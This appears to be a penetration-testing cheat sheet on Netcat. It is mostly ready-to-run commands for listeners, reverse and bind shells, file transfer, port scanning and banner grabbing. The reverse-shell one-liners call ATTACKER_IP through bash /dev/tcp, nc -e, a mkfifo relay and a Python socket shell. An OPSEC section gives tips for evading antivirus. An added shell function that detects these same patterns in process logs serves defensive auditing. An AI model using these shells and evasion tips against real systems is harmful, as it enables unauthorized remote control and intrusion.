Mnemata
@sanoski/

Netcat

Overview

Netcat (nc) is a lightweight, versatile networking utility often called the “Swiss Army knife” of TCP/IP. It reads and writes data across network connections using TCP or UDP. In pentesting it is used for reverse shells, bind shells, file transfer, port scanning, and as a listener for payloads.

Category

#maintaining-access #networking #pivoting

Phase

Maintaining Access

Variants

Variant         Notes
nc (original)   Traditional BSD netcat
ncat            Nmap project's improved version; supports SSL
netcat-openbsd  Common on Debian/Ubuntu
nc.exe          Windows port — often uploaded to targets

Install

# Kali — pre-installed
nc -h

# Debian/Ubuntu
sudo apt install netcat-openbsd

# ncat (comes with nmap)
sudo apt install nmap

Basic Syntax

nc [options] [host] [port]

Core Use Cases

Listeners (Attacker Side)

# Listen on port 4444 (catch reverse shells)
nc -lvnp 4444

# -l = listen
# -v = verbose
# -n = no DNS resolution
# -p = port

Reverse Shells (Target Side)

The target connects back to the attacker. Preferred when the target is behind NAT/firewall.

# Linux bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Using netcat (if available on target)
nc -e /bin/bash ATTACKER_IP 4444

# If nc doesn't support -e (OpenBSD version)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f

# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Bind Shells (Target Side)

The target opens a port; attacker connects in. Useful when the attacker cannot receive connections.

# On target — bind shell
nc -lvnp 4444 -e /bin/bash

# On attacker — connect to it
nc TARGET_IP 4444
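
As an added example (not part of the original note), a POSIX sh function that classifies a recorded process command line against the reverse-shell, bind-shell and fifo-relay patterns listed above, for auditing auditd EXECVE or shell-history records on the defending side. The sample command lines and the 10.0.0.5 address are constructed; the label names are my own.

```shell
#!/bin/sh
# Added example (not from the original note): classify a recorded process
# command line against the netcat shell patterns above, for auditing auditd
# EXECVE or shell-history records. Sample lines and 10.0.0.5 are constructed.

# classify_cmdline "<command line>"
# Prints a label and returns 0 on a shell pattern; prints nothing and
# returns 1 otherwise. A bare listener or port scan is not flagged.
classify_cmdline() {
    line=$1
    # a netcat binary as a command word: nc, ncat or netcat, by name or path
    nc='(^|[[:space:]/])(nc|ncat|netcat)[[:space:]]'

    # -e hands the connection to a program; -l alongside it means bind shell
    if printf '%s\n' "$line" | grep -Eq "${nc}(.*[[:space:]])?-e[[:space:]]"; then
        if printf '%s\n' "$line" | grep -Eq "${nc}(.*[[:space:]])?-[a-zA-Z]*l"; then
            echo "nc-bind-shell"
        else
            echo "nc-reverse-shell"
        fi
        return 0
    fi
    # mkfifo relay used when the installed nc has no -e
    if printf '%s\n' "$line" | grep -Eq 'mkfifo.*\|[[:space:]]*(nc|ncat|netcat)[[:space:]]'; then
        echo "nc-fifo-reverse-shell"
        return 0
    fi
    # bash /dev/tcp redirection: no netcat binary involved at all
    if printf '%s\n' "$line" | grep -Eq '/dev/tcp/[^/[:space:]]+/[0-9]+'; then
        echo "bash-devtcp-reverse-shell"
        return 0
    fi
    # python: socket connect followed by dup2 onto the standard descriptors
    if printf '%s\n' "$line" | grep -Eq 'socket.*connect.*dup2'; then
        echo "python-reverse-shell"
        return 0
    fi
    return 1
}

# Constructed sample records; printed when the script runs stand-alone
for cmd in \
    'nc -e /bin/bash 10.0.0.5 4444' \
    'nc -lvnp 4444 -e /bin/bash' \
    'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1' \
    'nc -zvn 192.168.1.10 22'
do
    label=$(classify_cmdline "$cmd") || label="no-shell-pattern"
    printf '%-26s %s\n' "$label" "$cmd"
done
```

The port-scan and plain-listener forms from this note deliberately return 1, so the function flags only lines that hand a shell to the connection.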

Upgrading a Shell (TTY)

# After catching a reverse shell, upgrade to a full TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Then, in the attacker's local terminal: background the shell, put the local
# tty into raw mode without echo, and bring the shell back to the foreground
Ctrl+Z
stty raw -echo; fg
export TERM=xterm

File Transfer

# Receiver (start first)
nc -lvnp 4444 > received_file.txt

# Sender
nc RECEIVER_IP 4444 < file_to_send.txt

# Transfer directory (pipe with tar)
# Receiver:
nc -lvnp 4444 | tar xvf -

# Sender:
tar cvf - /directory/ | nc RECEIVER_IP 4444

Port Scanning

# Quick TCP port scan
nc -zvn 192.168.1.10 1-1000

# Single port check
nc -zvn 192.168.1.10 22

# -z = zero I/O mode (scan only, don't send data)

Banner Grabbing

# Grab service banner
nc -nv 192.168.1.10 80
# Then type: GET / HTTP/1.0 [Enter] [Enter]

# SMTP banner
nc -nv 192.168.1.10 25

Simple Chat

# Machine A (listener)
nc -lvnp 1234

# Machine B (connect)
nc A_IP 1234
# Type messages — they appear on both sides

Ncat SSL

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl TARGET_IP 4444

OPSEC Notes

Netcat itself is often flagged by AV on Windows. Use ncat with --ssl or obfuscated payloads to reduce detection. Reverse shells over common ports (80, 443) blend in better with normal traffic. In-memory execution of nc.exe is preferred over writing to disk.

Related Tools

  • Metasploit / Meterpreter — More feature-rich post-exploitation; Netcat is the lightweight fallback
  • Hydra — Use discovered credentials with netcat to test raw service access
  • Nmap — Full-featured port scanner vs. nc’s basic scan capability

Tags

#ethical-hacking #maintaining-access #networking #reverse-shell #file-transfer
